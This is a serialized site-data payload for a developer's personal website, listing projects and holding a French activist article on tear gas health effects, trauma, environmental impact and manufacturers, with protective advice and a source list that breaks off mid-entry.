[{"data":1,"prerenderedAt":1873},["ShallowReactive",2],{"$QD8d9NkvSp":3,"articles":66},{"id":4,"title":5,"body":6,"description":58,"extension":59,"meta":60,"navigation":61,"path":62,"seo":63,"stem":64,"__hash__":65},"content/index.md","Eban Rami",{"type":7,"value":8,"toc":52},"minimark",[9,13,17,25,28,37,42,46,50],[10,11],"avatar-stack",{":avatars":12},"[\"/avatar-2.jpg\",\"/avatar-1.jpeg\",\"/avatar-3.jpg\"]",[14,15,16],"p",{},"Hey there! Welcome to my corner of the internet 🌱.",[14,18,19,20,24],{},"I'm ",[21,22,23],"strong",{},"Eban",", I like crafting empowering experiences through code.",[14,26,27],{},"On this website, you'll find projects I've worked on, articles I've written, and a few other things.",[14,29,30,31,36],{},"Feel free to explore and ",[32,33,35],"a",{"href":34},"mailto:rami@eban.eu.org","reach out"," if you have any questions!",[38,39,41],"h2",{"id":40},"projects","Projects",[43,44],"card-list",{":cards":45},"[{\"title\":\"mnl-website\",\"description\":\"Public and internal website for the Mouvement National Lycéen\",\"image\":\"Projects%200bf83c5ac16a4b078f07a4fddcd722d8/Screenshot_from_2024-07-30_11-49-31.png\",\"link\":\"https://mnl-syndicat.fr\",\"icon\":\"ph:hand-fist-bold\"},{\"title\":\"lacrymap\",\"description\":\"An interactive map displaying all the deaths created by tear gas use\",\"image\":\"Projects%200bf83c5ac16a4b078f07a4fddcd722d8/Screenshot_2024-12-18_at_19-15-17_Lacrymap_-_Carte_interactive_des_morts_causes_par_lutilisation_de_gaz_lacrymognes.png\",\"link\":\"https://lacrymap.eban.eu.org\",\"icon\":\"ph:map-trifold-bold\"},{\"title\":\"thermotrack\",\"description\":\"A heat-based contraception tracking PWA.\",\"image\":\"Projects%200bf83c5ac16a4b078f07a4fddcd722d8/Frame_2(1).png\",\"link\":\"https://github.com/ebanDev/ThermoTrack\",\"icon\":\"ph:circle-bold\"},{\"title\":\"redgpt\",\"description\":\"Search the web or deep dive into a topic with a materialist point of view.\",\"image\":\"Projects%200bf83c5ac16a4b078f07a4fddcd722d8/Screenshot_2024-11-10_at_16-50-56_redGPT.png\",\"link\":\"https://redgpt.eban.eu.org\",\"icon\":\"ph:magnifying-glass-bold\"},{\"title\":\"gazette\",\"description\":\"A mobile PWA NuxtJS client for reverse-engineered Europresse API.\",\"image\":\"Projects%200bf83c5ac16a4b078f07a4fddcd722d8/Frame_11(2).png\",\"link\":\"https://github.com/ebanDev/Gazette\",\"icon\":\"ph:newspaper-bold\"},{\"title\":\"nuxt-dynqr\",\"description\":\"A dynamic QR code generator for Nuxt tailored for Yunohost deployment\",\"link\":\"https://github.com/Solidaires-Etudiant-e-s/nuxt-dynqr\",\"icon\":\"ph:qr-code-bold\"},{\"title\":\"i-learned-blog\",\"description\":\"A former collaborative blog aimed at democratizing IT knowledge.\",\"image\":\"Projects%200bf83c5ac16a4b078f07a4fddcd722d8/Screenshot_from_2024-07-30_12-06-33.png\",\"link\":\"https://blog.ilearned.eu\",\"icon\":\"ph:eyeglasses-bold\"},{\"title\":\"iconschanger.koplugin\",\"description\":\"KOReader plugin for downloading and applying custom icon packs from the Iconify API\",\"image\":\"Projects%200bf83c5ac16a4b078f07a4fddcd722d8/Screenshot_2024-12-18_at_19-07-05_.png\",\"link\":\"https://sciencespass.eban.eu.org\",\"icon\":\"ph:device-tablet-bold\"},{\"title\":\"pomodaura\",\"description\":\"Pomodoro app with a customizable aura background and modular widget system.\",\"image\":\"Projects%200bf83c5ac16a4b078f07a4fddcd722d8/Screenshot_2024-12-18_at_19-13-37_Pomodaura.png\",\"link\":\"https://pomodaura.eban.eu.org\",\"icon\":\"ph:timer-bold\"}]",[38,47,49],{"id":48},"articles","Articles",[43,51],{"collection":48},{"title":53,"searchDepth":54,"depth":54,"links":55},"",2,[56,57],{"id":40,"depth":54,"text":41},{"id":48,"depth":54,"text":49},"Eban Rami's personal website","md",{},true,"/",{"title":5,"description":58},"index","0s2j9OMPWxdqVLeN0WDgDSSuHFuNLfJLGNxC6lr7eX8",[67,785,953,1309,1474],{"id":68,"title":69,"body":70,"description":770,"extension":59,"meta":771,"navigation":61,"path":781,"seo":782,"stem":783,"__hash__":784},"articles/articles/lacrymo.md","Sous les pavés, le gaz",{"type":7,"value":71,"toc":768},[72,79,84,87,90,97,100,103,112,122,128,132,135,141,144,150,153,159,162,173,176,182,185,189,192,195,198,201,204,208,211,214,220,223,226,232,235,238,242,245,253,256,291,294,298],[14,73,74,78],{},[75,76,77],"em",{},"L'odeur, les cris, la peur, le bruit, les pleurs… Chaque sens me rappelle ces sons d'explosions, la vue de la cohue, cette angoisse qui vous terrasse."," Ceci est le récit traumatique de nombre de nos camarades que nous avons pu recueillir. Plus que jamais en France, l’État a fait une utilisation démesurée des gaz dits lacrymogènes, empoisonnant et traumatisant sciemment la population. C’est au terme d’une enquête impliquant le précieux témoignage de 85 lycéen·ne·s, la consultation d’une vingtaine de publications scientifiques, l’interrogation de checheurs, l’interpellation de la préfecture de police et des entreprises produisant ces gaz que nous publions cet article. Celui-ci, nous l’espérons, permettra à l’ensemble du monde militant d’être au fait de la toxicité de ces produits, des différentes contre-mesures, mais aussi du business se cachant derrière ces armes d’oppression massive, ainsi que de leurs conséquences physiques, climatiques et psychologiques.",[80,81,83],"h1",{"id":82},"pas-que-de-la-poudre-aux-yeux-les-ravages-physiques-des-gaz-lacrymogènes","Pas que de la poudre aux yeux : les ravages physiques des gaz lacrymogènes",[14,85,86],{},"Steve, Zineb, Mohamadi, les noms de trois Français·es mort·e·s à cause de ces armes de guerre “non létales”, interdites par ailleurs sur le champ de bataille depuis 1993. À Sainte-Soline, c’est plus de 5 000 de ces grenades qui ont été lancées en moins de deux heures, d’après les autorités. Cette utilisation extensive d’explosifs libérant du gaz CS, ainsi que nos expériences personnelles avec ce type de produit, nous ont amené à nous interroger sur la toxicité des grenades lacrymogènes. Peu d’études ont été faites à propos de la dangerosité de ces gaz, nous avons néanmoins pu réunir une vingtaine d’études scientifiques sur le sujet, et avons mené une enquête dont nous détaillerons les conclusions ici.",[14,88,89],{},"À en croire le nom, on pourrait penser que ces gaz ont pour seul effet des pleurs chez les personnes exposées, il n’en est rien. Une étude faite sur plus de 2000 personnes exposées à ces agents toxiques rapportent que 89 % des patients ont ressenti des effets au niveau des yeux, mais aussi 80 % au niveau du nez (principalement des écoulements nasaux importants), on trouve aussi 40 % des répondant·e·s qui signalent des effets à la tête ou encore, plus étonnant, 54.5 % des personnes menstruées signalant des effets sur leur cycle menstruel (saignements plus importants, règles retardées, parfois même des fausses couches). Dans le cadre de cet article, nous avons pu faire une étude similaire auprès de lycéen·ne·s dont vous trouverez les résultats comparés à l’étude mentionnée plus tôt ci-dessous.",[14,91,92],{},[93,94],"img",{"alt":95,"src":96},"Frame 1 (11).png","lacrymo/effets.png",[14,98,99],{},"Des études expérimentales sur la dangerosité du gaz CS (gaz utilisé en France, à base de 2-Chlorobenzylidène malonitrile) ont été menés. À long terme, ont pu être observées plusieurs conséquences chez l’animal. Chez les rats, une étude a pu observer une diminution de la fertilité et des malformations testiculaires. Chez le singe, une étude a observé, après une très forte exposition, des effets toujours présents quatre semaines après inhalation ; ces effets incluent une réduction du volume des poumons, un emphysème (maladie causant une destruction progressive et irréversible des poumons) et d’autres effets pulmonaires d’une gravité alarmante. De nombreuses expériences sur des rats ont observé des effets similaires sur le système respiratoire, mais aussi des nécroses au niveau du cerveau et des reins. Aucune étude significative n’a été faite chez l’humain, cependant, ces résultats chez les animaux donnent une bonne indication du niveau de toxicité aigu de ce produit à haute dose.",[14,101,102],{},"Les effets sont nombreux, et il semble impossible d’en faire une liste exhaustive, tant les implications à long terme de l’exposition aux gaz lacrymogènes restent à ce jour méconnues chez l’humain, toutefois un élément inquiétant et méconnu sous-tend ces inquiétudes. Dans le sang, le gaz qui s’échappe des palets de grenades lacrymogènes se transformerait en cyanure, un poison mortel à haute dose. Cet aspect de la toxicité du gaz CS a pu faire l’objet d’une étude in situ, la seule sur cette question, publiée en 2020 par l’Association Toxicologie Chimie de Paris, celle-ci relève que les taux de cyanure dans le sang seraient multipliés par jusqu’à 5 après exposition, atteignant 0.75 mg/L, peu d’études permettent de savoir quels effets sur l’humain une exposition fréquente à de tels taux pourrait causer. On sait néanmoins que même à relativement faible dose, le cyanure a des effets importants au niveau cellulaire, perturbant de nombreux processus permettant par exemple au corps de créer de l’énergie, et qu’il entraînerait aussi le vieillissement prématuré des cellules (stress oxydatif).",[104,105,106],"ul",{},[107,108,109],"li",{},[21,110,111],{},"Les différents effets du cyanure sur le corps",[113,114,119],"pre",{"className":115,"code":117,"language":118,"meta":53},[116],"language-text","Ci-dessous une liste des effets détaillés du cyanure dans le corps, bien garder en tête qu’il est difficile de déterminer avec certitude si ces effets apparaissent bel et bien au vu du taux de cyanure libéré dans le sang après exposition au gaz CS.\n","text",[120,121,117],"code",{"__ignoreMap":53},[113,123,126],{"className":124,"code":125,"language":118,"meta":53},[116],"- **Hypoxie/Anoxie Cellulaire** : L’exposition au cyanure bloque le circuit biologique qui permet aux cellules de métaboliser correctement l'oxygène. Cela conduit à une hypoxie, c'est-à-dire un manque d'oxygène, et dans des cas plus graves, à une anoxie, où les cellules sont totalement privées d'oxygène. Cette privation d'oxygène peut entraîner des dommages cellulaires importants, en particulier dans les tissus qui dépendent fortement de l'oxygène, tels que le cerveau et le cœur.\n- **Stress oxydatif** : Le cyanure interfère avec les processus cellulaires qui produisent de l'énergie en présence d'oxygène, entraînant une accumulation de radicaux libres d'oxygène réactifs (RLO). Ces RLO en excès peuvent endommager les cellules et les tissus en provoquant des dommages oxydatifs. Cela peut contribuer au développement de diverses maladies, y compris les maladies neurodégénératives et certains cancers, en perturbant le fonctionnement normal des cellules et en provoquant des lésions génétiques.\n- **Carbamylation** : Le cyanure entraine une modification au niveau de protéines telles que l’hémoglobine (globules rouges), ce qui a pour conséquence une perte de poids, des cataractes (altération de la vision) et des polyneuropathies (maladie neurologique).\n- **Métaux** : Les niveaux en divers métaux tels que le Zinc (antioxydant), le Cuivre (système immunitaire et production de globules rouges) et le Sélénium (fonctionnement de la thyroïde) baisse drastiquement après une intoxication au cyanure.\n\nLes effets les plus extrêmes de cette métabolisation du gaz CS en cyanure sont néanmoins à relativiser, les conséquences de cette métabolisation est remise en cause par certaines personnes au sein de la communauté scientifique.\n",[120,127,125],{"__ignoreMap":53},[80,129,131],{"id":130},"souvenirs-lacrymogènes-entre-anxiété-et-troubles-post-traumatiques","Souvenirs lacrymogènes : entre anxiété et troubles post-traumatiques",[14,133,134],{},"À la lecture des résultats de notre étude, un élément saute aux yeux, les récits traumatiques des personnes exposées.",[14,136,137],{},[93,138],{"alt":139,"src":140},"Instagram post - 13(4).png","lacrymo/Instagram_post_-_13(4).png",[14,142,143],{},"On observe dans notre enquête qu’au moins un tiers des répondants disent souffrir de conséquences psychologiques, l’étude citée dans la partie précédente rapporte quant à elle que 72.4 % des personnes exposées auraient subi des problèmes de santé mentale. Quelle qu’en soit la proportion exacte, elle est significative, inquiétante et largement sous-évaluée par l’opinion publique.",[14,145,146],{},[93,147],{"alt":148,"src":149},"Instagram post - 14.png","lacrymo/Instagram_post_-_14.png",[14,151,152],{},"Une étude menée en 2020 sur les gilets jaunes a observé une hausse statistiquement significative des cas de dépression chez les personnes exposées aux violences policières, de plus les violences physiques répétées subit par les manifestant·e·s peuvent mener à des traumatismes. Ces traumatismes entrainent bien souvent des syndromes de stress post-traumatique (SSPT, plus connu sous l’acronyme anglais PTSD).",[14,154,155],{},[93,156],{"alt":157,"src":158},"Instagram post - 15.png","lacrymo/Instagram_post_-_15.png",[14,160,161],{},"L’étude citée plus tôt dénombre 15.5 % des personnes présentant des symptômes s’apparentant à un syndrome de stress post-traumatique (PTSD), nous avons pu aussi dénombrer de nombreux témoignages présentant des symptômes caractéristiques de PTSD dans notre étude, comme ceux ci-dessus. Ce syndrome est caractérisé par le DSM-5 (le manuel de diagnostic de référence en psychologie), entre autres par :",[104,163,164,167,170],{},[107,165,166],{},"L’exposition réelle ou menacée à la mort, des violences physiques graves ou des violences sexuelles",[107,168,169],{},"L’intrusion de souvenirs traumatiques dans la vie de tous les jours (flashback) ou dans les rêves.",[107,171,172],{},"Un comportement d’évitement face à des situations associées au traumatisme",[14,174,175],{},"Ces critères sont largement remplis par de nombreux témoignages qui rapportent “des flashbacks, des cauchemars” et même des “odeurs fantômes”. Beaucoup relatent aussi des “trigger” s’immisçant dans la vie de tous les jours, “oiseaux dans le ciel”, “fumées blanches”, “sons d’explosions”, “odeur qui ressemble vaguement”, autant de signaux déclencheurs de stress suite à un évènement traumatisant.",[14,177,178],{},[93,179],{"alt":180,"src":181},"Instagram post - 16.png","lacrymo/Instagram_post_-_16.png",[14,183,184],{},"Au-delà de ces cas extrêmes, beaucoup de personnes ont aujourd’hui peur de se rendre en manifestation à cause de la répression violente qui y est exercée. Tous ces éléments interrogent, surtout quand on sait que le suicide est la troisième cause de mortalité chez les jeunes, et que la présence d’un PTSD est un élément augmentant statistiquement de façon significative la probabilité pour une personne de se donner la mort. Il y a aujourd’hui urgence à mettre en place un soutien psychologique aux victimes de violences policières, à accompagner celles-ci vers des parcours de thérapie et à mettre en place des espaces d’échange militants autour de ces thématiques.",[80,186,188],{"id":187},"à-chaudes-larmes-impact-écologique-des-gaz-lacrymogènes","À chaudes larmes : impact écologique des gaz lacrymogènes",[14,190,191],{},"D’après Amnesty International, les composants des grenades lacrymogènes incluent le nitrate de potassium, un composé chimique hautement dangereux pour l’environnement (il provoque chez les êtres vivants des mutations génétiques et des malformations fœtales), le principal pays exportateur de nitrite de potassium est le Chili. Une partie seulement du nitrate de potassium est obtenu par le minage, l’autre est obtenue à l’aide de réactions chimique à partir d’ammoniac, un autre composant hautement toxique pour les êtres vivants, ayant déjà entrainé la mort de plusieurs personnes dans des usines chimiques en Chine, principal pays producteur d’ammoniac.",[14,193,194],{},"On retrouve un schéma similaire pour le chlorate de potassium, un autre composant important de ces grenades, cet explosif est, lui aussi, hautement toxique, son rejet dans les cours d’eau entraine des effets dévastateurs pour la faune aquatique. Les plus grosses entreprises exportant ces produits sont chinoises et indiennes, pays où les règles environnementales sont souvent négligées.",[14,196,197],{},"La nitrocellulose est aussi, d’après Amnesty International, utilisé dans les grenades lacrymogènes, ce produit est obtenu à base de coton, dont la production est très polluante. En aout 2022, une usine française de production de nitrocellulose à Bergerac avait subi une explosion, celle-ci avait entraîné des blessures pour huit travailleurs sur le site de l’usine classée Sevezo.",[14,199,200],{},"Deux autres éléments, le Silicone et le carbonate de magnésium, sont eux produits principalement en Chine, avec la présence de grosses usines dans la région du Xinjiang, connues pour l’exploitation dans des camps de concentration de la minorité ouïghour. La production de ces deux produits est, elle aussi, polluante, dans une moindre mesure néanmoins que ceux présentés plus tôt.",[14,202,203],{},"En plus de la pollution venant de la production de ces armes, on peut s’interroger sur les impacts lors de leur utilisation. Une étude a mesuré les taux de chlorure de méthylène lors de l’utilisation du CS, ceux-ci atteignent des niveaux jusqu’à quatre fois le taux maximal autorisé dans les usines permettant d’éviter des effets sur la santé. Ce gaz est suspecté d’entrainer des trous dans la couche d’ozone. Aussi, la transformation en cyanure exposée plus tôt entraine un risque important pour les êtres vivants, celle-ci ayant aussi lieu dans l’eau, elle pourrait ainsi contaminer les cours d’eau et les nappes phréatiques. Aussi, quelques minutes après l’explosion, le gaz lacrymogène reprend son état initial de poudre, celle-ci vient se déposer sur toutes les surfaces, sur les trottoirs, les bâtiments, les vêtements, les cheveux et la peau. Il faut alors compter 50 à 60 jours pour une décontamination naturelle totale.",[80,205,207],{"id":206},"les-pleurs-et-largent-des-pleurs-des-artificiers-aux-profits-monstres","Les pleurs et l’argent des pleurs : des artificiers aux profits monstres",[14,209,210],{},"99 144 700 euros, c’est le chiffre d'affaires cumulé en 2021 des deux sociétés d’armement vendant des grenades lacrymogènes à l’État français, Alsetex et Nobel Sport, ces deux sociétés enregistrant une croissance autour de 14 %.",[14,212,213],{},"La première de ces sociétés, Alsetex, est une société aux mains de la famille Bares, une grande famille bourgeoise française qui détient une vingtaine d’entreprises, totalisant plus de 130 millions d’euros de chiffre d'affaires en 2021. Alsetex fait partie du groupe Étienne Lacroix, les entreprises de ce groupe sont ensuite distribuées aux membres de la famille depuis huit générations, beaucoup sont des sociétés de pyrotechnie, d’autres de holding ou d’immobilier. Une cartographie de ce réseau est disponible ci-dessous, elle est probablement incomplète tellement cet enchevêtrement de sociétés est grand.",[14,215,216],{},[93,217],{"alt":218,"src":219},"New Graph (1).jpg","lacrymo/New_Graph_(1).jpg",[14,221,222],{},"Alsetex est la société productrice de deux modèles de grenades lacrymogènes utilisées en France, la CM6, qui libère 6 palets de gaz toxique après l’explosion et couvre 800 m², ainsi que la plus petite CM3 qui en libère trois, et ne couvre que 250 m². Alsetex fournit aussi l’État en GM2L, des grenades à la fois lacrymogènes et assourdissantes, 840 000 GM2L ont été commandées en novembre 2022 par le ministère de l’intérieur, c’est ce modèle de grenade qui a amené Serge D. à frôler la mort à Saint Soline. Alsetex a été épinglé pour avoir notamment fourni des grenades lacrymogènes à Bahreïn face à une révolte populaire en 2011, qui entraînera la mort de 13 personnes à cause de ces grenades. Au Sénégal, aussi, Alsetex a fourni des GM2L et d’autre matériel, on dénombrera de nombreuses mutilations lors de la répression des manifestations après l’arrestation de l’opposant politique Ousmane Sonko.",[14,224,225],{},"La deuxième entreprise fournissant l’État en grenades lacrymogènes, Nobel Sport, n’est pas en reste. Celle-ci est dirigée par Gilles Roccia, mais aussi le très influent économiste Dominique Jacomet (il dirige l’institut français de la mode, la Sorbonne Business School, il est aussi chevalier de la légion d’honneur) ou encore les descendants de la famille noble Devaulx De Chambord. C’est donc une entreprise très bien intégrée dans le milieu politico-industriel de la haute bourgeoisie française. Vous trouverez ci-dessous une cartographie des dirigeants et des liens de cette société.",[14,227,228],{},[93,229],{"alt":230,"src":231},"nobel-sport.jpg","lacrymo/nobel-sport.jpg",[14,233,234],{},"Gilles Roccia, le PDG, dirige trois entreprises, Cheddite fabrique des cartouches vides, Nobel Sport produit la poudre et Sofisport est une société de holding. Les munitions produites par les sociétés de Gilles Roccia ont notamment été vendues à travers des montages obscurs au Myanmar, au Togo, en Biélorussie, en Iran ou encore au Sénégal pour réprimer dans des bains de sang des manifestations.",[14,236,237],{},"Ces deux sociétés soutiennent activement des régimes totalitaires dans la répression brutale des mouvements sociaux sur leur sol, entraînant des dizaines de morts. L’État français, qui a en novembre 2022 commandé pour 38 millions d’euros du matériel répressif à ces deux sociétés, participe ainsi activement au financement de sociétés soutenant ces régimes. Interrogés à propos de ces commandes, les services du ministère de l’Intérieur n’ont pas donné suite à nos questions.",[80,239,241],{"id":240},"conclusion","Conclusion",[14,243,244],{},"En conclusion, il semble aujourd’hui vital de mettre sur la table la question des conséquences physiques, psychologiques, environnementales et économiques de l’utilisation des gaz lacrymogènes. Ceux-ci ont des effets dévastateurs sur la santé mentale et physique à long et court terme, c’est pourquoi utiliser un matériel de protection adapté est une nécessité. Il est aussi impératif de mettre en place au sein de nos groupes de lutte des espaces d’écoute et de soutien psychologique.",[14,246,247,248],{},"Une carte des décès causés par l’usage du gaz lacrymogène est disponible ici : ",[32,249,250],{"href":250,"rel":251},"https://lacrymap.eban.eu.org/",[252],"nofollow",[14,254,255],{},"On pourra tirer de l’ensemble des informations contenues dans cet article ces mesures de protections :",[104,257,258,261,264,267,276,279,282,285,288],{},[107,259,260],{},"Porter un masque FFP2 et des lunettes de piscines ou un masque de ski.",[107,262,263],{},"Porter des vêtements couvrant au maximum la peau et éviter les crèmes ou produits cosmétiques qui font s’accrocher les particules de CS.",[107,265,266],{},"Éviter le port de tampons afin d’empêcher le CS de s’y fixer",[107,268,269,270,275],{},"Veiller à avoir une alimentation équilibrée et riche en ",[32,271,274],{"href":272,"rel":273},"https://fr.wikipedia.org/wiki/Antioxydant#Antioxydants_dans_l'alimentation",[252],"antioxydants"," permettant d’éviter le stress oxydatif créé par le CS.",[107,277,278],{},"Éviter la consommation de produits alimentaires exposés au gaz sans les avoir lavés préalablement",[107,280,281],{},"Pour les personnes asthmatiques, veiller à bien s’écarter grandement du nuage de gaz avant de prendre de la Ventoline pour éviter d’en inhaler encore plus",[107,283,284],{},"Rincer abondamment toute partie du corps ayant été exposée au gaz",[107,286,287],{},"En cas de symptômes à long terme, ne pas hésiter à en parler avec un médecin",[107,289,290],{},"En cas de conséquences à long terme d’ordre psychologique, en parler avec des camarades, la discussion autour d’expériences traumatisantes permet d’en atténuer les effets.",[14,292,293],{},"Enfin, il paraît nécessaire et urgent que l’État français renonce à l’utilisation de telles armes contre ses citoyens. Comme nous l’avons toujours fait, nous soignerons nos blessés, aucune répression ne saura mettre à mal notre détermination.",[80,295,297],{"id":296},"sources","Sources",[104,299,300,310,321,335,349,356,366,376,387,397,407,421,432,446,456,470,480,490,501,515,529,543,553,564,574,583,593,603,613,622,633,640,654,668,679,689,699,708,722,732,745,755],{},[107,301,302,305,306],{},[75,303,304],{},"33 sickened by ammonia gas leak in northwestern China",". (2014, septembre 8). South China Morning Post. ",[32,307,308],{"href":308,"rel":309},"https://www.scmp.com/news/china/article/1587785/thirty-three-sickened-ammonia-gas-leak-northwestern-capital",[252],[107,311,312,313,316,317],{},"À Sainte-Soline, plus de 5 100 grenades tirées le 25 mars. (2023, mars 30). ",[75,314,315],{},"Le Télégramme",". ",[32,318,319],{"href":319,"rel":320},"https://www.letelegramme.fr/france/a-sainte-soline-plus-de-5-100-grenades-tirees-le-25-mars-4079490.php",[252],[107,322,323,324,327,328,316,331],{},"Adam-Troian, J., Çelebi, E., & Mahfud, Y. (2020). Police use of force during street protests : A pressing public mental health concern. ",[75,325,326],{},"EClinicalMedicine",", ",[75,329,330],{},"26",[32,332,333],{"href":333,"rel":334},"https://doi.org/10.1016/j.eclinm.2020.100509",[252],[107,336,337,338,327,341,344,345],{},"Alhillo, H. T., Arnaout, M. M., Radhi, H. S., Al-Dhahir, M. A., Moscote-Salazar, L. R., & Hoz, S. S. (2018). Direct head injury caused by a tear gas cartridge. Questions on safety : A case report from Iraq and review of the literature. ",[75,339,340],{},"Journal of Clinical Neuroscience",[75,342,343],{},"56",", 179‑182. ",[32,346,347],{"href":347,"rel":348},"https://doi.org/10.1016/j.jocn.2018.06.051",[252],[107,350,351,352,355],{},"American Psychiatric Association, & American Psychiatric Association (Éds.). (2013). ",[75,353,354],{},"Diagnostic and statistical manual of mental disorders : DSM-5"," (5th ed). American Psychiatric Association.",[107,357,358,359,316,362],{},"Ammoniac. (2023). In ",[75,360,361],{},"Wikipédia",[32,363,364],{"href":364,"rel":365},"https://fr.wikipedia.org/w/index.php?title=Ammoniac&oldid=205837549#Ammoniac_anthropique",[252],[107,367,368,371,372],{},[75,369,370],{},"Bahrain’s use of tear gas against protesters increasingly deadly",". (2012, janvier 26). Amnesty International. ",[32,373,374],{"href":374,"rel":375},"https://www.amnesty.org/en/latest/press-release/2012/01/bahrain-s-use-tear-gas-against-protesters-increasingly-deadly/",[252],[107,377,378,379,382,383],{},"B.Corson, E. (2022a, février 23). ",[75,380,381],{},"Maintien de l’ordre : Le savoir-faire français s’exporte",". POLITIS. ",[32,384,385],{"href":385,"rel":386},"https://www.politis.fr/articles/2022/02/maintien-de-lordre-le-savoir-faire-francais-sexporte-44131/",[252],[107,388,389,390,382,393],{},"B.Corson, E. (2022b, octobre 31). ",[75,391,392],{},"Des douilles françaises trouvées en Iran",[32,394,395],{"href":395,"rel":396},"https://www.politis.fr/articles/2022/10/des-douilles-francaises-trouvees-en-iran-44978/",[252],[107,398,399,402,403],{},[75,400,401],{},"Bergerac : Ce que l’on sait de l’incendie survenu après plusieurs explosions dans une usine classée Seveso",". (2022, août 4). Franceinfo. ",[32,404,405],{"href":405,"rel":406},"https://www.francetvinfo.fr/france/bergerac-ce-que-l-on-sait-de-l-incendie-survenu-apres-plusieurs-explosions-dans-une-usine-classee-seveso_5292616.html",[252],[107,408,409,410,327,413,416,417],{},"Brown, J. L., Lyons, C. E., Toddes, C., Monko, T., & Tyshynsky, R. (2021). Tear gas safety and usage practices. ",[75,411,412],{},"Journal of Science Policy & Governance",[75,414,415],{},"18","(01). ",[32,418,419],{"href":419,"rel":420},"https://doi.org/10.38126/JSPG180104",[252],[107,422,423,424,427,428],{},"Carl Roth GmbH. (s. d.). ",[75,425,426],{},"Fiche de données de sécurité chlorate de potassium",". Consulté 9 juillet 2023, à l’adresse ",[32,429,430],{"href":430,"rel":431},"https://www.carlroth.com/medias/SDB-7959-LU-FR.pdf",[252],[107,433,434,435,327,438,441,442],{},"Çelebi, E., Adam-Troian, J., & Mahfud, Y. (2022). Positive Links Between Exposure to Police Violence, PTSD, and Depression Symptoms Among Yellow Vests Protesters in France. ",[75,436,437],{},"Journal of Interpersonal Violence",[75,439,440],{},"37","(5‑6), 2267‑2288. ",[32,443,444],{"href":444,"rel":445},"https://doi.org/10.1177/0886260520935863",[252],[107,447,448,451,452],{},[75,449,450],{},"« Des dommages irréversibles » : Qu’est-ce que la grenade GM2L si décriée par les manifestants ?"," (s. d.). midilibre.fr. Consulté 10 juillet 2023, à l’adresse ",[32,453,454],{"href":454,"rel":455},"https://www.midilibre.fr/2023/03/27/elle-fait-le-bruit-dun-avion-au-decollage-quest-ce-que-la-grenade-gm2l-si-decriee-par-les-manifestants-11092097.php",[252],[107,457,458,459,327,462,465,466],{},"Dimitroglou, Y., Rachiotis, G., & Hadjichristodoulou, C. (2015). Exposure to the Riot Control Agent CS and Potential Health Effects : A Systematic Review of the Evidence. ",[75,460,461],{},"International Journal of Environmental Research and Public Health",[75,463,464],{},"12","(2), 1397‑1411. ",[32,467,468],{"href":468,"rel":469},"https://doi.org/10.3390/ijerph120201397",[252],[107,471,472,473,316,476],{},"Feng, E. (2021, juillet 6). How Did China Become The World’s Dominant Polysilicon Producer? ",[75,474,475],{},"NPR",[32,477,478],{"href":478,"rel":479},"https://www.npr.org/2021/07/06/1013266774/how-did-china-become-the-worlds-dominant-polysilicon-producer",[252],[107,481,482,485,486],{},[75,483,484],{},"Findings on the Worst Forms of Child Labor—Chile",". (s. d.). DOL. Consulté 5 juillet 2023, à l’adresse ",[32,487,488],{"href":488,"rel":489},"http://www.dol.gov/agencies/ilab/resources/reports/child-labor/chile",[252],[107,491,492,493,496,497],{},"Grenades Lacrymogènes. (s. d.). ",[75,494,495],{},"Maintien de l’ordre",". Consulté 4 juillet 2023, à l’adresse ",[32,498,499],{"href":499,"rel":500},"https://maintiendelordre.fr/grenades-lacrymogenes-fumigenes/",[252],[107,502,503,504,327,507,510,511],{},"Hill, A. R., Silverberg, N. B., Mayorga, D., & Baldwin, H. E. (2000). Medical Hazards of the Tear Gas CS A Case of Persistent, Multisystem, Hypersensitivity Reaction and Review of the Literature: ",[75,505,506],{},"Medicine",[75,508,509],{},"79","(4), 234‑240. ",[32,512,513],{"href":513,"rel":514},"https://doi.org/10.1097/00005792-200007000-00004",[252],[107,516,517,518,316,522,327,525,528],{},"Krapf, R., & Thalmann, H. (1981). ",[519,520,521],"span",{},"Acute exposure to CS tear gas and clinical studies",[75,523,524],{},"Schweizerische Medizinische Wochenschrift",[75,526,527],{},"111","(52), 2056‑2060.",[107,530,531,532,327,535,538,539],{},"Krysinska, K., & Lester, D. (2010). Post-Traumatic Stress Disorder and Suicide Risk : A Systematic Review. ",[75,533,534],{},"Archives of Suicide Research",[75,536,537],{},"14","(1), 1‑23. ",[32,540,541],{"href":541,"rel":542},"https://doi.org/10.1080/13811110903478997",[252],[107,544,545,548,549],{},[75,546,547],{},"Le gaz lacrymogène, une arme sans blessés, mais pas sans effets",". (2020, février 1). L’Orient-Le Jour. ",[32,550,551],{"href":551,"rel":552},"https://www.lorientlejour.com/article/1204802/le-gaz-lacrymogene-une-arme-sans-blesses-mais-pas-sans-effets.html",[252],[107,554,555,556,559,560],{},"Levels, C. on A. E. G., Toxicology, C. on, Toxicology, B. on E. S. and, Studies, D. on E. and L., & Council, N. R. (2014). Tear Gas (CS). In ",[75,557,558],{},"Acute Exposure Guideline Levels for Selected Airborne Chemicals : Volume 16",". National Academies Press (US). ",[32,561,562],{"href":562,"rel":563},"https://www.ncbi.nlm.nih.gov/books/NBK224932/",[252],[107,565,566,567,316,570],{},"List of countries by silicon production. (2022). In ",[75,568,569],{},"Wikipedia",[32,571,572],{"href":572,"rel":573},"https://en.wikipedia.org/w/index.php?title=List_of_countries_by_silicon_production&oldid=1122448377",[252],[107,575,576,577,316,579],{},"Magnesium carbonate. (2023). In ",[75,578,569],{},[32,580,581],{"href":581,"rel":582},"https://en.wikipedia.org/w/index.php?title=Magnesium_carbonate&oldid=1158444820",[252],[107,584,585,588,589],{},[75,586,587],{},"Magnesium carbonate production in Xinjiang China",". (s. d.). Consulté 5 juillet 2023, à l’adresse ",[32,590,591],{"href":591,"rel":592},"https://www.mindat.org/locentries.php?p=20275&m=2482",[252],[107,594,595,596,316,599],{},"Mahfud, Y., Samuel, A., Çelebi, E., & Adam-Troian, J. (2020). ",[75,597,598],{},"The link between CS gas exposure and menstrual cycle issues among female Yellow Vest protesters in France",[32,600,601],{"href":601,"rel":602},"https://doi.org/10.1101/2020.10.11.20210955",[252],[107,604,605,606,427,609],{},"New Jersey departement of health. (s. d.). ",[75,607,608],{},"Hazardous substance fact sheet Potassium Chlorate",[32,610,611],{"href":611,"rel":612},"https://nj.gov/health/eoh/rtkweb/documents/fs/1560.pdf",[252],[107,614,615,616,316,618],{},"Nitrite de potassium. (2022). In ",[75,617,361],{},[32,619,620],{"href":620,"rel":621},"https://fr.wikipedia.org/w/index.php?title=Nitrite_de_potassium&oldid=195343508",[252],[107,623,624,625,628,629],{},"Olivier Monod. (2019, mai 11). 